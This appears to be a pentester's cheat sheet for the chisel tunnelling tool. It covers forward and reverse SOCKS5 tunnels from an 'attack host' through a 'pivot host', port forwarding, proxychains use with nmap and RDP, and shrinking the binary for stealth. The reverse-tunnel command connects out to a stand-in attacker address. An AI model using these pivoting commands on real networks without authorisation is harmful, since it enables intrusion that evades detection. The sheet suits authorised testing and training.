chisel
TCP/UDP tunneling tool written in Go. Transports data over HTTP, secured with SSH. Supports SOCKS5 proxying and port forwarding.
Install
git clone https://github.com/jpillora/chisel.git
cd chisel && go build
Or grab a prebuilt binary from Releases.
Forward SOCKS5 Tunnel
Server on pivot host, client on attack host:
# Pivot host
./chisel server -v -p 1234 --socks5
# Attack host
./chisel client -v <PIVOT_IP>:1234 socks
Reverse SOCKS5 Tunnel
Server on attack host, client on pivot host:
# Attack host
sudo ./chisel server --reverse -v -p 1234 --socks5
# Pivot host
./chisel client -v <ATTACKER_IP>:1234 R:socks
Port Forwarding
Forward a specific port through the tunnel:
# Forward local 8080 to remote 80
./chisel client <SERVER_IP>:1234 8080:<TARGET_IP>:80
# Reverse: expose remote port locally
./chisel client <SERVER_IP>:1234 R:8080:<TARGET_IP>:80
Proxychains Integration
Add to /etc/proxychains.conf:
[ProxyList]
socks5 127.0.0.1 1080
Then use:
proxychains xfreerdp /v:<TARGET_IP> /u:<USER> /p:<PASS>
proxychains nmap -sT <TARGET_IP>
Common Flags
| Flag | Description |
|---|---|
-v | Verbose output |
-p | Server listen port |
--socks5 | Enable SOCKS5 proxy |
--reverse | Allow reverse tunnels (server-side) |
R:socks | Reverse SOCKS5 remote (client-side) |
--auth | Set username:password for authentication |
Notes
- Default SOCKS5 proxy port is 1080
- Transfer binary to pivot host via
scp,wget, or other file transfer method - Mind binary size for stealth; consider
go build -ldflags="-s -w"to shrink it